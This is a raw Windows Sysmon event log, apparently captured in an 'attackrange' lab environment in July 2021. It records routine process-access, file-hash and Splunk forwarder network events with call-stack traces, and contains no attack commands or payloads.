07:55:12.091{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001049994Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:55:12.090{466BC892-32D3-60E8-700B-00000000CF01}1664384C:\Windows\System32\sihost.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\usermgrcli.dll+1121|C:\Windows\System32\modernexecserver.dll+37dac|C:\Windows\System32\modernexecserver.dll+37d4f|C:\Windows\System32\modernexecserver.dll+375a6|C:\Windows\System32\modernexecserver.dll+1a1c4|C:\Windows\System32\modernexecserver.dll+3191d|C:\Windows\System32\modernexecserver.dll+32871|C:\Windows\System32\modernexecserver.dll+3278f|C:\Windows\SYSTEM32\ntdll.dll+2063e|C:\Windows\SYSTEM32\ntdll.dll+1e854|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001050079Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:55:13.587{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=23D58D6B25AAF92B7469DBD4829745E2,SHA256=7005A460B8B4B94580D206E7ADC1F9071A05FBCF77E1326102E1B327FD3EAE97,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000808058Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:55:13.132{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=621D19A71682FBE8413C1B9A8ADAE94E,SHA256=1A1BB8F327138CA3734630065553A56C77DAABAA6B89CD5E63EB9B19C56ADD41,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050078Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:55:13.403{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=5DE6E2552C6990C5C99995E2E98D5850,SHA256=C5C20516F630A2EFC0AB400077A2C5831EAC0054EF8A2A5D0DA8139CF248D68C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050077Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:55:13.403{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=BFB7A60568BAD93FEEDDD5811B279FCC,SHA256=41E505FDC8079702E1C2991BDFE1378F44D1A95BB59E1C4BA0F8834B73AF93CF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050076Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:55:13.403{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=F1A35B9FA106FE44AB3B126229A97131,SHA256=239EBA12DC2C809D5A12BDC958C2BC07E8FA2F000AE3E8F0B55E2D480D8DDEB8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050075Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:55:13.403{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=899E56C79EF305E4689018984B72C959,SHA256=A67CE4058D80CE6395A1A2C008F241C7DAB21A973642CB15A2DFC5E8E529940D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050074Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:55:13.403{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=184141C828157B13D27FA11C646362D6,SHA256=E17C4938E7821F11E518237CB95F0F1BCB9ABB97863605B4BF2564458C4FB30F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050073Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:55:13.403{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=5E6BA370807AE2B7F970520C918F77FA,SHA256=6E919EEA103CCBC4BE1BBD76F1E01721AD78FD0BF8B5C3C8F2D77F922C50116F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050072Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:55:13.403{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=64214F24100FF268509847B760196229,SHA256=4D675E714D62A239A82616FBF820C0BD499F7FAC4ACF31DB581FCC8E146D1464,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050071Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:55:13.403{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=1F56D37D26C9ED260E7BC90045D143FA,SHA256=7AAF46F97527AF5AFCBB3DDD4D0E7D7129BB2A8F08AD439E7F1449C2E289BAC4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050070Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:55:13.403{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=1EA85D6A53C643BA3952370B8D1CE3BB,SHA256=57BA6998A616A03E70C110BF9F427F69E21EC9F0EB24496500F6FA41F1E9C02F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050069Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:55:13.403{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=2B600C7D8A4D7DC0D59206B59BC621BB,SHA256=9F17FBA351C17712603040050C89A019A820E69B406E028D739B6455CCF337C8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050068Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:55:13.403{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=75EA11E28191C39B7269B2500051751E,SHA256=6F48069D42F83FF47BD55069EB5995A176AA746A5DBB0D7407C5AF4972F9BFC1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050067Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:55:13.121{466BC892-3152-60E8-240B-00000000CF01}3328ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\axpgvkas.default-release\prefs-1.jsMD5=D41D8CD98F00B204E9800998ECF8427E,SHA256=E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001050066Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:55:04.764{466BC892-02C7-60E8-6D00-00000000CF01}3524C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local51069-false10.0.1.12-8000- 23542300x80000000000000001050080Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:55:14.605{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=728DB7790BBACEEF276F8647F8093178,SHA256=15E79CB9A2DF35838B172AFC55C16C2C96EE6F783FBD7473DBEED1AA6939A093,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000808059Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:55:14.147{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CF23B6D1E5CD22C25F81175223B0D34C,SHA256=1E18A7B0C8410A26657EB68B72E0CC16B3A3D7012663DE0C475D86499C0CC4DE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050083Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:55:15.609{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4A099EED439B88C3DF47DDA50DB01988,SHA256=F1046E2F83A7C50D899A173B12723C07643E6EF14CA1006D525D30DBD0CD0542,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000808060Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:55:15.190{0C1E0330-0518-60E8-D300-00000000D001}380NT 
AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=88B1DEF1A9DCDA71B7CC36A9C3027C5F,SHA256=4E242693B01475B1FF11B62F2E34463408299FAF3CB4D4E30D96A0578C8E99CB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050082Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:55:15.431{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=95F4E028F2513385B2A03A486B505647,SHA256=81AACA200B6975476B482923D83D3B2A05A671D3FF05BFBD2DC0F3F63860BA76,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050081Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:55:15.431{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=2461D2806B0B35F67086AAC98A80F36D,SHA256=E8F571BA9ECBE5E01B5874B7D3ECC0A5E43729E880CEC7D3E5F62A0FBCC3DAE8,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001050101Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:55:16.930{466BC892-32D3-60E8-6F0B-00000000CF01}70763308C:\Windows\System32\RuntimeBroker.exe{466BC892-F524-60EB-4C7D-00000000CF01}7300C:\Windows\system32\backgroundTaskHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+620bb|C:\Windows\System32\windows.storage.dll+9f28d|C:\Windows\System32\windows.storage.dll+a1970|C:\Windows\System32\windows.storage.dll+59c7f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6520c|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+6155d|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+7c419|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b 10341000x80000000000000001050100Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:55:16.930{466BC892-32D3-60E8-700B-00000000CF01}1664384C:\Windows\System32\sihost.exe{466BC892-F524-60EB-4C7D-00000000CF01}7300C:\Windows\system32\backgroundTaskHost.exe0x100000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\twinui.appcore.dll+684b|C:\Windows\System32\twinui.appcore.dll+756d|C:\Windows\system32\activationmanager.dll+b93d|C:\Windows\System32\twinui.appcore.dll+3df1|C:\Windows\SYSTEM32\twinapi.appcore.dll+2accd|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27a9|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6520c|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+6155d|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+7c419|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001050099Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:55:16.930{466BC892-02AF-60E8-0C00-00000000CF01}8449428C:\Windows\system32\svchost.exe{466BC892-F524-60EB-4C7D-00000000CF01}7300C:\Windows\system32\backgroundTaskHost.exe0x100000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+620bb|c:\windows\system32\bisrv.dll+1d9ff|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27a9|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6520c|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+6155d|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+7c419|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e 10341000x80000000000000001050098Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:55:16.908{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-F524-60EB-4C7D-00000000CF01}7300C:\Windows\system32\backgroundTaskHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+78b1|C:\Windows\SYSTEM32\psmserviceexthost.dll+74d7|C:\Windows\SYSTEM32\psmserviceexthost.dll+1a384|C:\Windows\SYSTEM32\psmserviceexthost.dll+11055|C:\Windows\SYSTEM32\psmserviceexthost.dll+108cf|C:\Windows\SYSTEM32\ntdll.dll+2063e|C:\Windows\SYSTEM32\ntdll.dll+1e854|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050097Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:55:16.908{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-F524-60EB-4C7D-00000000CF01}7300C:\Windows\system32\backgroundTaskHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+489d|C:\Windows\SYSTEM32\psmserviceexthost.dll+1a2ed|C:\Windows\SYSTEM32\psmserviceexthost.dll+11055|C:\Windows\SYSTEM32\psmserviceexthost.dll+108cf|C:\Windows\SYSTEM32\ntdll.dll+2063e|C:\Windows\SYSTEM32\ntdll.dll+1e854|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050096Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:55:16.908{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-0677-60E8-BC03-00000000CF01}5972C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+489d|C:\Windows\SYSTEM32\psmserviceexthost.dll+1a2ed|C:\Windows\SYSTEM32\psmserviceexthost.dll+11055|C:\Windows\SYSTEM32\psmserviceexthost.dll+108cf|C:\Windows\SYSTEM32\ntdll.dll+2063e|C:\Windows\SYSTEM32\ntdll.dll+1e854|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050095Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:55:16.908{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-0675-60E8-B703-00000000CF01}5772C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+489d|C:\Windows\SYSTEM32\psmserviceexthost.dll+1a2ed|C:\Windows\SYSTEM32\psmserviceexthost.dll+11055|C:\Windows\SYSTEM32\psmserviceexthost.dll+108cf|C:\Windows\SYSTEM32\ntdll.dll+2063e|C:\Windows\SYSTEM32\ntdll.dll+1e854|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050094Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:55:16.908{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-32D6-60E8-840B-00000000CF01}7376C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+489d|C:\Windows\SYSTEM32\psmserviceexthost.dll+1a2ed|C:\Windows\SYSTEM32\psmserviceexthost.dll+11055|C:\Windows\SYSTEM32\psmserviceexthost.dll+108cf|C:\Windows\SYSTEM32\ntdll.dll+2063e|C:\Windows\SYSTEM32\ntdll.dll+1e854|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050093Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:55:16.908{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+489d|C:\Windows\SYSTEM32\psmserviceexthost.dll+1a2ed|C:\Windows\SYSTEM32\psmserviceexthost.dll+11055|C:\Windows\SYSTEM32\psmserviceexthost.dll+108cf|C:\Windows\SYSTEM32\ntdll.dll+2063e|C:\Windows\SYSTEM32\ntdll.dll+1e854|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050092Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:55:16.908{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-F524-60EB-4C7D-00000000CF01}7300C:\Windows\system32\backgroundTaskHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+78b1|C:\Windows\SYSTEM32\psmserviceexthost.dll+74d7|C:\Windows\SYSTEM32\psmserviceexthost.dll+12fce|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c526|C:\Windows\SYSTEM32\resourcepolicyserver.dll+11927|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\R
PCRT4.dll+1ae1c 10341000x80000000000000001050091Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:55:16.908{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-F524-60EB-4C7D-00000000CF01}7300C:\Windows\system32\backgroundTaskHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c526|C:\Windows\SYSTEM32\resourcepolicyserver.dll+11927|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001050090Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:55:16.908{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-0677-60E8-BC03-00000000CF01}5972C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c526|C:\Windows\SYSTEM32\resourcepolicyserver.dll+11927|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 